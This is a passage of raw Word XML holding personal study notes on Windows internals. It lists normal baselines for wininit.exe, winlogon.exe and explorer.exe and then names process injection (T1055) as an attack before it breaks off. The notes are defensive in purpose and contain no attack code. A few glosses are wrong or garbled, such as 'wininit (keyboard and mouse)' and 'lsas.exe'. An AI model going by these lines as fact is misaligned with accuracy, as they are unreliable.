    <w:p w14:paraId="7ED18B30" w14:textId="021468CE" w:rsidR="00AA36AC" w:rsidRPr="00AA36AC" w:rsidRDefault="00AA36AC" w:rsidP="00AA36AC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA36AC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Parent Process</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA36AC">
        <w:t>: wininit.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47D5AD1E" w14:textId="450F96AE" w:rsidR="00AA36AC" w:rsidRPr="00AA36AC" w:rsidRDefault="00AA36AC" w:rsidP="00AA36AC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA36AC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Number of Instances</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA36AC">
        <w:t>: One</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B5F3B53" w14:textId="198CAE83" w:rsidR="00AA36AC" w:rsidRPr="00AA36AC" w:rsidRDefault="00AA36AC" w:rsidP="00AA36AC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA36AC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>User Account</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA36AC">
        <w:t>: Local System</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F73E0C7" w14:textId="09799D1A" w:rsidR="00AA36AC" w:rsidRPr="00AA36AC" w:rsidRDefault="00AA36AC" w:rsidP="00AA36AC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA36AC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Start Time</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA36AC">
        <w:t>: Within seconds of boot time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33525086" w14:textId="784F1E99" w:rsidR="00EA2346" w:rsidRDefault="00EA2346">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E55BDB9" w14:textId="26D29F79" w:rsidR="00AA36AC" w:rsidRDefault="00EA2346" w:rsidP="00EA2346">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EA2346">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">winlogon.exe </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA2346">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Windows Logon</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA2346">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29DB4AE6" w14:textId="580472C8" w:rsidR="00EA2346" w:rsidRPr="00EA2346" w:rsidRDefault="00EA2346" w:rsidP="000E166C">
      <w:pPr>
        <w:ind w:firstLine="720"/>
      </w:pPr>
      <w:r>
        <w:t>(initiated by smss.exe</w:t>
      </w:r>
      <w:r w:rsidR="000E166C">
        <w:t>, created with</w:t>
      </w:r>
      <w:r w:rsidR="000E166C" w:rsidRPr="000E166C">
        <w:t xml:space="preserve"> csrss.exe within Session 1</w:t>
      </w:r>
      <w:r w:rsidR="000E166C">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DDD5F97" w14:textId="0A733018" w:rsidR="009134EF" w:rsidRDefault="00EA2346" w:rsidP="00EA2346">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="00EA2346">
        <w:t>handling the Secure Attention Sequence (SAS). It is the ALT+CTRL+DELETE key combination users press to enter their username &amp; password.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CC93D92" w14:textId="1795AC04" w:rsidR="00EA2346" w:rsidRDefault="000E166C" w:rsidP="00030DE6">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="000E166C">
        <w:t>responsible for loading the user profile. It loads the user's NTUSER.DAT</w:t>
      </w:r>
      <w:r w:rsidR="00030DE6">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="000E166C">
        <w:t xml:space="preserve">into HKCU, and </w:t>
      </w:r>
      <w:r w:rsidRPr="002C583A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>userinit.exe</w:t>
      </w:r>
      <w:r w:rsidRPr="000E166C">
        <w:t xml:space="preserve"> loads the user's</w:t>
      </w:r>
      <w:r w:rsidR="002C583A">
        <w:t xml:space="preserve"> t</w:t>
      </w:r>
      <w:r w:rsidR="002C583A" w:rsidRPr="002C583A">
        <w:t>he user's shell</w:t>
      </w:r>
      <w:r w:rsidR="002C583A">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EDEEC83" w14:textId="19241065" w:rsidR="00030DE6" w:rsidRDefault="00030DE6" w:rsidP="00030DE6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000E166C">
        <w:t>NTUSER.DAT</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> “</w:t>
      </w:r>
      <w:r w:rsidRPr="00030DE6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>hidden file</w:t>
      </w:r>
      <w:r w:rsidRPr="00030DE6">
        <w:t xml:space="preserve"> stored in </w:t>
      </w:r>
      <w:r w:rsidRPr="00030DE6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>every user’s profile folder</w:t>
      </w:r>
      <w:r w:rsidRPr="00030DE6">
        <w:t xml:space="preserve"> on a Windows system</w:t>
      </w:r>
      <w:r>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00030DE6">
        <w:t xml:space="preserve"> contains all of that </w:t>
      </w:r>
      <w:r w:rsidRPr="00030DE6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>user's personal settings</w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78C55D12" w14:textId="31214F61" w:rsidR="00030DE6" w:rsidRDefault="00030DE6" w:rsidP="00030DE6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00030DE6">
        <w:t xml:space="preserve">HKCU stands for </w:t>
      </w:r>
      <w:r w:rsidRPr="00030DE6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>HKEY_CURRENT_USER</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> “</w:t>
      </w:r>
      <w:r w:rsidRPr="00030DE6">
        <w:t>Registry stores user settings”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58016342" w14:textId="684C3A16" w:rsidR="00533B07" w:rsidRPr="00533B07" w:rsidRDefault="00533B07" w:rsidP="000E166C">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00533B07">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Normal</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D6AB1FB" w14:textId="01EC416F" w:rsidR="00533B07" w:rsidRPr="00533B07" w:rsidRDefault="00533B07" w:rsidP="00533B07">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00533B07">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Image Path</w:t>
      </w:r>
      <w:r w:rsidRPr="00533B07">
        <w:t>: %</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00533B07">
        <w:t>SystemRoot</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00533B07">
        <w:t>%\System32\winlogon.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="013AE60B" w14:textId="5F96E22A" w:rsidR="00533B07" w:rsidRPr="00533B07" w:rsidRDefault="00533B07" w:rsidP="00533B07">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00533B07">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Parent Process</w:t>
      </w:r>
      <w:r w:rsidRPr="00533B07">
        <w:t>: Created by an instance of smss.exe that exits, so analysis tools usually do not provide the parent process name.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B97F136" w14:textId="5E3BF241" w:rsidR="00533B07" w:rsidRPr="00533B07" w:rsidRDefault="00533B07" w:rsidP="00533B07">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00533B07">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Number of Instances</w:t>
      </w:r>
      <w:r w:rsidRPr="00533B07">
        <w:t>: One or more</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F0D8DD2" w14:textId="769571CE" w:rsidR="00533B07" w:rsidRPr="00533B07" w:rsidRDefault="00533B07" w:rsidP="00533B07">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00533B07">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>User Account</w:t>
      </w:r>
      <w:r w:rsidRPr="00533B07">
        <w:t>: Local System</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66067120" w14:textId="6D9ECCE3" w:rsidR="00533B07" w:rsidRDefault="00533B07" w:rsidP="00533B07">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00533B07">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Start Time</w:t>
      </w:r>
      <w:r w:rsidRPr="00533B07">
        <w:t>: Within seconds of boot time for the first instance (for Session 1).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="277E5E59" w14:textId="0B34E3FD" w:rsidR="00890C7F" w:rsidRPr="009359D1" w:rsidRDefault="009359D1" w:rsidP="009359D1">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:color w:val="EE0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009359D1">
        <w:rPr>
          <w:color w:val="EE0000"/>
        </w:rPr>
        <w:t>Winlogon.exe (load user profile after lsas.exe that verify user)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4289135E" w14:textId="0A20E1E5" w:rsidR="00890C7F" w:rsidRPr="00890C7F" w:rsidRDefault="00EE3DA8" w:rsidP="00890C7F">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00890C7F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">explorer.exe </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="00890C7F" w:rsidRPr="00890C7F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Windows Explorer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="129A2526" w14:textId="375A14CB" w:rsidR="000E166C" w:rsidRPr="00EA2346" w:rsidRDefault="002C583A" w:rsidP="002C583A">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="002C583A">
        <w:t>gives the user access to their folders and files</w:t>
      </w:r>
      <w:r w:rsidR="005541C7">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20A9014B" w14:textId="5EDCA101" w:rsidR="009134EF" w:rsidRDefault="00193BAA" w:rsidP="009134EF">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="005541C7" w:rsidRPr="005541C7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Normal</w:t>
      </w:r>
      <w:r w:rsidR="005541C7">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="585FA2B0" w14:textId="5474F3FB" w:rsidR="005541C7" w:rsidRPr="005541C7" w:rsidRDefault="005541C7" w:rsidP="005541C7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005541C7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Image Path</w:t>
      </w:r>
      <w:r w:rsidRPr="005541C7">
        <w:t>: %</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005541C7">
        <w:t>SystemRoot</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005541C7">
        <w:t>%\explorer.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67F11E44" w14:textId="25C0CB36" w:rsidR="005541C7" w:rsidRPr="005541C7" w:rsidRDefault="005541C7" w:rsidP="005541C7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005541C7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Parent Process</w:t>
      </w:r>
      <w:r w:rsidRPr="005541C7">
        <w:t>: Created by userinit.exe and exits</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2822F8DC" w14:textId="7040A716" w:rsidR="005541C7" w:rsidRPr="005541C7" w:rsidRDefault="005541C7" w:rsidP="005541C7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005541C7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Number of Instances</w:t>
      </w:r>
      <w:r w:rsidRPr="005541C7">
        <w:t>: One or more per interactively logged-in user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60B1E7D0" w14:textId="7B56FA57" w:rsidR="005541C7" w:rsidRPr="005541C7" w:rsidRDefault="005541C7" w:rsidP="005541C7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005541C7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>User Account</w:t>
      </w:r>
      <w:r w:rsidRPr="005541C7">
        <w:t>: Logged-in user(s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2416F2E0" w14:textId="68C2824D" w:rsidR="005541C7" w:rsidRPr="005541C7" w:rsidRDefault="005541C7" w:rsidP="005541C7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005541C7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Start Tim</w:t>
      </w:r>
      <w:r w:rsidRPr="005541C7">
        <w:t>e: First instance when the first interactive user logon session begins</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E62D1D5" w14:textId="1F704CD3" w:rsidR="005541C7" w:rsidRPr="00EA2346" w:rsidRDefault="005541C7" w:rsidP="009134EF"/>
    <w:p w14:paraId="0EA36122" w14:textId="77777777" w:rsidR="009134EF" w:rsidRDefault="009134EF" w:rsidP="009134EF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2CD20263" w14:textId="77777777" w:rsidR="009134EF" w:rsidRDefault="009134EF" w:rsidP="009134EF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0FB249D0" w14:textId="77777777" w:rsidR="009134EF" w:rsidRDefault="009134EF" w:rsidP="009134EF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="45C66CBB" w14:textId="77777777" w:rsidR="009134EF" w:rsidRDefault="009134EF" w:rsidP="009134EF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6846164D" w14:textId="77777777" w:rsidR="009134EF" w:rsidRDefault="009134EF" w:rsidP="009134EF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="63D2760A" w14:textId="77777777" w:rsidR="009134EF" w:rsidRDefault="009134EF" w:rsidP="009134EF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1C075752" w14:textId="77777777" w:rsidR="009134EF" w:rsidRDefault="009134EF" w:rsidP="009134EF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="60AD97AA" w14:textId="77777777" w:rsidR="009134EF" w:rsidRDefault="009134EF" w:rsidP="009134EF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7EA03B68" w14:textId="77777777" w:rsidR="009134EF" w:rsidRDefault="009134EF" w:rsidP="009134EF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6413FF23" w14:textId="77777777" w:rsidR="009134EF" w:rsidRDefault="009134EF" w:rsidP="009134EF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6E2FD361" w14:textId="77777777" w:rsidR="009134EF" w:rsidRDefault="009134EF" w:rsidP="009134EF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3BCD1F22" w14:textId="77777777" w:rsidR="009134EF" w:rsidRDefault="009134EF" w:rsidP="009134EF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="47302E99" w14:textId="77777777" w:rsidR="009134EF" w:rsidRDefault="009134EF" w:rsidP="009134EF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1E7875DB" w14:textId="77777777" w:rsidR="009134EF" w:rsidRDefault="009134EF" w:rsidP="009134EF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0E4E16F9" w14:textId="77777777" w:rsidR="009134EF" w:rsidRDefault="009134EF" w:rsidP="009134EF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>////////////////////////////////////////////////////////////////////////////////////////////////////</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5338E772" w14:textId="77777777" w:rsidR="00C00009" w:rsidRDefault="00C00009" w:rsidP="00C00009">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>////////////////////////////////////////////////////////////////////////////////////////////////////</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4913E15F" w14:textId="77777777" w:rsidR="00C00009" w:rsidRPr="00975FBC" w:rsidRDefault="00C00009" w:rsidP="00C00009">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00975FBC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Windows Internals &amp; Windows Logs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AB9D500" w14:textId="77777777" w:rsidR="00C00009" w:rsidRPr="00975FBC" w:rsidRDefault="00C00009" w:rsidP="00C00009">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00975FBC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Process</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="662D3285" w14:textId="77777777" w:rsidR="00C00009" w:rsidRDefault="00C00009" w:rsidP="00C57C02">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="00E60DFD">
        <w:t>process represents the execution of a program</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, an </w:t>
      </w:r>
      <w:r w:rsidRPr="00E60DFD">
        <w:t>application can contain one or more processes</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00E60DFD">
        <w:t>process has many components</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EF80A21" w14:textId="77777777" w:rsidR="00C00009" w:rsidRDefault="00C00009" w:rsidP="00C57C02">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="00C00DE3">
        <w:t>processes are created from the execution of an application</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CA990D2" w14:textId="77777777" w:rsidR="00C00009" w:rsidRDefault="00C00009" w:rsidP="00C57C02">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="00C00DE3">
        <w:t xml:space="preserve">Each process </w:t>
      </w:r>
      <w:r w:rsidRPr="008059A9">
        <w:t>has many components</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50259371" w14:textId="77777777" w:rsidR="00C00009" w:rsidRDefault="00C00009" w:rsidP="00C57C02">
      <w:pPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00C00DE3">
        <w:t>the resources needed to execute a program. virtual address space, executable code, open handles to system objects, a security context, a unique process identifier, environment variables, a priority class, minimum and maximum working set sizes, and at least one thread of execution.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C963702" w14:textId="77777777" w:rsidR="00C00009" w:rsidRDefault="00C00009" w:rsidP="00C57C02">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>Ex of default applications that start processes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39C92337" w14:textId="77777777" w:rsidR="00C00009" w:rsidRDefault="00C00009" w:rsidP="00C57C02">
      <w:pPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>MsMpEng</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> (Microsoft Defender)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7458C680" w14:textId="77777777" w:rsidR="00C00009" w:rsidRDefault="00C00009" w:rsidP="00C57C02">
      <w:pPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r>
        <w:t>wininit (keyboard and mouse)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CC40E52" w14:textId="77777777" w:rsidR="00C00009" w:rsidRDefault="00C00009" w:rsidP="00C57C02">
      <w:pPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r>
        <w:t>lsass (credential storage)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58660FF7" w14:textId="77777777" w:rsidR="00C00009" w:rsidRPr="008059A9" w:rsidRDefault="00C00009" w:rsidP="00C57C02">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008059A9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Attacks against processes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E7F6F10" w14:textId="77777777" w:rsidR="00C00009" w:rsidRPr="008059A9" w:rsidRDefault="00C00009" w:rsidP="00C57C02">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008059A9">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Attackers can target processes to evade detections and hide malware as legitimate processes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59D4AE13" w14:textId="77777777" w:rsidR="00C00009" w:rsidRPr="00C50DC4" w:rsidRDefault="00C00009" w:rsidP="00C57C02">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C50DC4">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Process Injection (</w:t>
      </w:r>
      <w:hyperlink r:id="rId12" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00C50DC4">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
          </w:rPr>
          <w:t>T1055</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00C50DC4">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F26F302" w14:textId="77777777" w:rsidR="00C00009" w:rsidRPr="00C50DC4" w:rsidRDefault="00C00009" w:rsidP="00C57C02">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
